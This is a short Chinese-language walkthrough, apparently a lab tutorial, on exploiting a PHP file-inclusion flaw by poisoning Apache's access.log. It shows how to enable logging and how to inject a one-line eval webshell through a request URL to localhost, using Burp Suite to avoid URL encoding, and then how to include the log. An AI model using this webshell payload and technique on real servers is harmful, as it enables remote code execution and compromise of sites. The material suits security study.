文件包含漏洞

1)环境配置
1.首先要开启日志记录。以 phpstudy 为例子，进入到Apache的配置文件目录 conf

2.编辑 httpd.conf ，找到#CustomLog "logs/access.log 并将最前方的 #号删除并重启 Apache

3.进入 Apache 的 logs 文件夹里，可以看到 access.log 文件

2)利用
1.浏览器访问 http://127.0.0.1/<?php eval($ POST['a']);?> ,  Apache 会将客户端的请求消息记录下来，此时在 access.log 可以看到已经成功将一句话木马给写进去了
先将木马写进去：

使用文件包含漏洞访问文件：
文件被读取出来(木马被URL重新编码，语法不正确，因此不能执行)； 需要知道文件路径

2.此时包含该文件会失败，因为浏览器将一些特殊字符进行了一次URL编码。利用 Burp suite 进行修改

3. 再次查看access.log文件，一句话木马植入成功

4. 木马植入成功：